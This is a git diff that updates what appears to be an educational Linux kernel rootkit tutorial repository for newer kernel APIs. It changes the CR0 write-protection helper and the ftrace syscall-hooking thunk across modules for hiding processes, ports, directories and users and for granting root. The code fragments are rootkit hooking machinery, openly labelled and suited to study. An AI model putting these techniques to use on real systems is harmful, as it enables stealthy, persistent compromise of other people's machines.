diff --git a/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c b/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c index c7a8f11..fd28767 100644 --- a/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c +++ b/3_RootkitTechniques/3.1_syscall_hooking/rootkit.c @@ -61,7 +61,7 @@ * the WP bit, so we write our own instead */ inline void cr0_write(unsigned long cr0) { - asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order)); + asm volatile("mov %0,%%cr0" : "+r"(cr0) : : "memory"); } /* Bit 16 in the cr0 register is the W(rite) P(rotection) bit which diff --git a/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h b/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h index 1624ce4..ab74ace 100644 --- a/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h +++ b/3_RootkitTechniques/3.2_kill_signalling/ftrace_helper.h @@ -78,8 +78,9 @@ } /* See comment below within fh_install_hook() */ -static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs) +static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs) { + struct pt_regs *regs = ftrace_get_regs(fregs); struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); #if USE_FENTRY_OFFSET @@ -112,7 +113,7 @@ * (see USE_FENTRY_OFFSET). */ hook->ops.func = fh_ftrace_thunk; hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS - | FTRACE_OPS_FL_RECURSION_SAFE + | FTRACE_OPS_FL_RECURSION | FTRACE_OPS_FL_IPMODIFY; err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); diff --git a/3_RootkitTechniques/3.2_kill_signalling/rootkit.c b/3_RootkitTechniques/3.2_kill_signalling/rootkit.c index 416f275..bc69385 100644 --- a/3_RootkitTechniques/3.2_kill_signalling/rootkit.c +++ b/3_RootkitTechniques/3.2_kill_signalling/rootkit.c @@ -60,6 +60,7 @@ { return orig_kill(regs); } + return -999; } #else /* This is the old way of declaring a syscall hook */ diff --git a/3_RootkitTechniques/3.3_set_root/ftrace_helper.h b/3_RootkitTechniques/3.3_set_root/ftrace_helper.h index 808453d..ed2d8cd 100644 --- a/3_RootkitTechniques/3.3_set_root/ftrace_helper.h +++ b/3_RootkitTechniques/3.3_set_root/ftrace_helper.h @@ -92,8 +92,9 @@ } /* See comment below within fh_install_hook() */ -static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs) +static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs) { + struct pt_regs *regs = ftrace_get_regs(fregs); struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); #if USE_FENTRY_OFFSET @@ -126,7 +127,7 @@ * (see USE_FENTRY_OFFSET). */ hook->ops.func = fh_ftrace_thunk; hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS - | FTRACE_OPS_FL_RECURSION_SAFE + | FTRACE_OPS_FL_RECURSION | FTRACE_OPS_FL_IPMODIFY; err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); diff --git a/3_RootkitTechniques/3.4_hiding_directories/ftrace_helper.h b/3_RootkitTechniques/3.4_hiding_directories/ftrace_helper.h index 808453d..ed2d8cd 100644 --- a/3_RootkitTechniques/3.4_hiding_directories/ftrace_helper.h +++ b/3_RootkitTechniques/3.4_hiding_directories/ftrace_helper.h @@ -92,8 +92,9 @@ } /* See comment below within fh_install_hook() */ -static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs) +static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs) { + struct pt_regs *regs = ftrace_get_regs(fregs); struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); #if USE_FENTRY_OFFSET @@ -126,7 +127,7 @@ * (see USE_FENTRY_OFFSET). */ hook->ops.func = fh_ftrace_thunk; hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS - | FTRACE_OPS_FL_RECURSION_SAFE + | FTRACE_OPS_FL_RECURSION | FTRACE_OPS_FL_IPMODIFY; err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); diff --git a/3_RootkitTechniques/3.5_hiding_processes/ftrace_helper.h b/3_RootkitTechniques/3.5_hiding_processes/ftrace_helper.h index 808453d..ed2d8cd 100644 --- a/3_RootkitTechniques/3.5_hiding_processes/ftrace_helper.h +++ b/3_RootkitTechniques/3.5_hiding_processes/ftrace_helper.h @@ -92,8 +92,9 @@ } /* See comment below within fh_install_hook() */ -static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs) +static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs) { + struct pt_regs *regs = ftrace_get_regs(fregs); struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); #if USE_FENTRY_OFFSET @@ -126,7 +127,7 @@ * (see USE_FENTRY_OFFSET). */ hook->ops.func = fh_ftrace_thunk; hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS - | FTRACE_OPS_FL_RECURSION_SAFE + | FTRACE_OPS_FL_RECURSION | FTRACE_OPS_FL_IPMODIFY; err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); diff --git a/3_RootkitTechniques/3.6_hiding_ports/ftrace_helper.h b/3_RootkitTechniques/3.6_hiding_ports/ftrace_helper.h index 808453d..ed2d8cd 100644 --- a/3_RootkitTechniques/3.6_hiding_ports/ftrace_helper.h +++ b/3_RootkitTechniques/3.6_hiding_ports/ftrace_helper.h @@ -92,8 +92,9 @@ } /* See comment below within fh_install_hook() */ -static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs) +static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs) { + struct pt_regs *regs = ftrace_get_regs(fregs); struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); #if USE_FENTRY_OFFSET @@ -126,7 +127,7 @@ * (see USE_FENTRY_OFFSET). */ hook->ops.func = fh_ftrace_thunk; hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS - | FTRACE_OPS_FL_RECURSION_SAFE + | FTRACE_OPS_FL_RECURSION | FTRACE_OPS_FL_IPMODIFY; err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); diff --git a/3_RootkitTechniques/3.7_char_interfering/ftrace_helper.h b/3_RootkitTechniques/3.7_char_interfering/ftrace_helper.h index 808453d..ed2d8cd 100644 --- a/3_RootkitTechniques/3.7_char_interfering/ftrace_helper.h +++ b/3_RootkitTechniques/3.7_char_interfering/ftrace_helper.h @@ -92,8 +92,9 @@ } /* See comment below within fh_install_hook() */ -static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs) +static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs) { + struct pt_regs *regs = ftrace_get_regs(fregs); struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); #if USE_FENTRY_OFFSET @@ -126,7 +127,7 @@ * (see USE_FENTRY_OFFSET). */ hook->ops.func = fh_ftrace_thunk; hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS - | FTRACE_OPS_FL_RECURSION_SAFE + | FTRACE_OPS_FL_RECURSION | FTRACE_OPS_FL_IPMODIFY; err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0); diff --git a/3_RootkitTechniques/3.9_hiding_logged_in_users/ftrace_helper.h b/3_RootkitTechniques/3.9_hiding_logged_in_users/ftrace_helper.h index 808453d..ed2d8cd 100644 --- a/3_RootkitTechniques/3.9_hiding_logged_in_users/ftrace_helper.h +++ b/3_RootkitTechniques/3.9_hiding_logged_in_users/ftrace_helper.h @@ -92,8 +92,9 @@ } /* See comment below within fh_install_hook() */ -static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs) +static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *fregs) { + struct pt_regs *regs = ftrace_get_regs(fregs); struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops); #if USE_FENTRY_OFFSET @@ -126,7 +127,7 @@ * (see USE_FENTRY_OFFSET). */ hook->ops.func = fh_ftrace_thunk; hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS - | FTRACE_OPS_FL_RECURSION_SAFE + | FTRACE_OPS_FL_RECURSION | FTRACE_OPS_FL_IPMODIFY; err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);